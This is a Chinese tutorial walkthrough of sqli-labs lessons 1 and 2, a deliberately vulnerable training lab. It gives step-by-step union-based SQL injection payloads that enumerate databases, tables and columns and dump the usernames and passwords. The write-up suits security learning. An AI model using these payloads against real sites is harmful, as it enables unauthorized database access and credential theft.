sqli-labs注入lesson1-2闯关秘籍

·lesson1

1.判断是否存在注入,并判断注入的类型

其实根据第一关提示

 判断注入类型

输入下面的语句进行测试:

?id=1' and '1'='1

返回界面如下图:说明存在 字符型注入

 2. 使用order by 猜测SQL查询语句中的字段数

?id=1' order by 3 --+

注:--+ 在这里是注释   表示注释掉后边的东西

当order by 4 的时候 发现页面报错,所以字段数为3

 3.确定显示的字段显示位

?id=1' and 1=2 union select 1,2,3 --+

可以看到只有第2列和第3列的结果显示在页面上,我们只有 2,3可以用,接下来我们就利用 2,3来查询数据库的信息

1)关于显示位:

我们在进行手工SQL注入的时候会用到order by 查询列数,然后通过union select 爆出在网页中的显示位。这个显示位指的是网页中能够显示数据的位置。

因为我们通过order by 知道了列数只有三列。然后在这里使用了union select 1,2,3 --+ ,网页中显示了信息2、3,说明网页只能够显示第2列和第3列中的信息,不能显示其他列的信息。也可以理解为网页只开放了2、3这个窗口,想要查询数据库信息就必须要通过这个窗口。所以我们想要知道某个属性的信息,比如admin,就要把admin属性放到2或3的位置上,这样就能通过第2列爆出admin的信息

2)关于union查询

union操作符用于合并两个或者多个select语句的结果集

(注:使用union联合查询的前提是必须要有显示位,并且两个select必有相同列、且各列的数据类型也相同。)

当 id 的数据在数据库中不存在时,即id为假,(让id=-1或者是在该关中语句id=1' and 1=2,两个 sql 语句进行联合操作时,当前一个语句选择的内容为空,我们这里就将后面的语句的内容显示出来)此处前台页面返回了我们构造的 union 的数据。如果我们让union之前的id=1'即为真,这时候会显示id=1'的信息并不会回显union之后的select信息:

4.爆破数据库的版本和数据库名

?id=1' and 1=2 union select 1,version(),database() --+

发现版本型号以及数据库名security

 

5.查看所有数据库名

?id=1' and 1=2 union select 1,(select group_concat(schema_name) from information_schema.schemata),3 --+

查询数据库名,发现有security数据库,该数据库中一般存放用户名和密码

 6.根据数据库名爆破出该数据库中的所有表名

?id=1' and 1=2 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3 --+

所爆破出来的列名中发现users表

 7.爆破users表中的列名

?id=1' and 1=2 union select 1,(select group_concat(column_name) from information_schema.columns where table_name='users'),3 --+

发现有user列和password列

 

8.爆破用户名和密码

?id=1' and 1=2 union select 1,(select group_concat(password) from security.users),(select group_concat(username) from security.users) --+

 第一关成功获取用户名和密码

 

·lesson2

1.与第一关不同的地方是   第一关是字符型注入,第二关是数字型注入

?id=1' and 1=2

?id=1 --+

2.使用order by 猜测语句中的字段数

?id=1 order by 3 --+

?id=1 order by 4 --+

3.确定显示位

?id=1 and 1=2 union select 1,2,3 --+

4.爆破数据库的版本和数据库名

?id=1 and 1=2 union select 1,version(),database() --+

 5.查看所有数据库名

?id=1 and 1=2 union select 1,(select group_concat(schema_name) from information_schema.schemata),3 --+

 6.根据数据库名爆破表名

?id=1 and 1=2 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3 --+

 7.爆破表中列名

?id=1 and 1=2 union select 1,(select group_concat(column_name) from information_schema.columns where table_name='users'),3 --+

 8.爆破用户名和密码

?id=1 and 1=2 union select 1,(select group_concat(password) from security.users),(select group_concat(username) from security.users) --+

 第二关也成功获取用户名和密码

原文地址:https://www.cnblogs.com/Ghost-m/p/12262997.html